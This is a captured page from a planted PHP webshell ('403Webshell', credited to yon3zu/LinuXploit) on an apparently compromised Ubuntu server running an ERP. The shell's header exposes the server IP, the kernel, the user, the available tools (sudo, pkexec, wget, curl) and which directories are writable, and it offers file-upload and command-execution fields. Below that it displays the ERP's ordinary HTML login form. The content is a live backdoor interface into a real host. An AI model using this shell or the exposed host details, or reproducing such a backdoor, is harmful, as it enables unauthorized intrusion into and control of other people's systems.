403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/erp/auth/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/erp/auth/login.html
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>{{white_label_company_name}} ERP</title>
    <link rel="stylesheet" href="./../build/css/style.min.css" />
  </head>
  <body>
    <div id="main">
      <main class="oh-auth">
          <div class="oh-auth-card">
            <h1 class="oh-onboarding-card__title oh-onboarding-card__title--h2 text-center my-3">Sign In</h1>
            <p class="text-muted text-center">Please login to access the dashboard.</p>
            <div class="oh-form-group">
              <div class="oh-input-group">
                <label class="oh-label" for="email">E-mail</label>
                <input type="email" id="email" class="oh-input w-100" placeholder="e.g. jane.doe@acme.com" />
              </div>
              <div class="oh-input-group">
                <label class="oh-label" for="password">Password</label>
                <div class="oh-password-input-container">
                  <input
                    type="password"
                    id="password"
                    class="oh-input oh-input--password w-100"
                    placeholder="Use alphanumeric characters"
                  />
                  <button
                    class="oh-btn oh-btn--transparent oh-password-input--toggle"
                  >
                    <ion-icon
                      class="oh-passowrd-input__show-icon"
                      title="Show Password"
                      name="eye-outline"
                    ></ion-icon>
                    <ion-icon
                      class="oh-passowrd-input__hide-icon d-none"
                      title="Hide Password"
                      name="eye-off-outline"
                    ></ion-icon>
                  </button>
                </div>
              </div>
              <button
              href="#"
              class="oh-btn oh-onboarding-card__button mt-4 oh-btn--secondary oh-btn--shadow w-100 mb-4"
              role="button"
            >
            <ion-icon class="me-2" name="lock-closed-outline"></ion-icon>
              Secure Sign-in
            </button>
            <small class="text-center"><a href="#" class="oh-link oh-link--secondary justify-content-center">Forgot password?</a></small>
            </div>
          </div>
      </main>
    </div>
    <script src="./../build/js/web.frontend.min.js"></script>
    <script
      type="module"
      src="https://unpkg.com/ionicons@5.5.2/dist/ionicons/ionicons.esm.js"
    ></script>
    <script
      nomodule
      src="https://unpkg.com/ionicons@5.5.2/dist/ionicons/ionicons.js"
    ></script>
    <script></script>
  </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit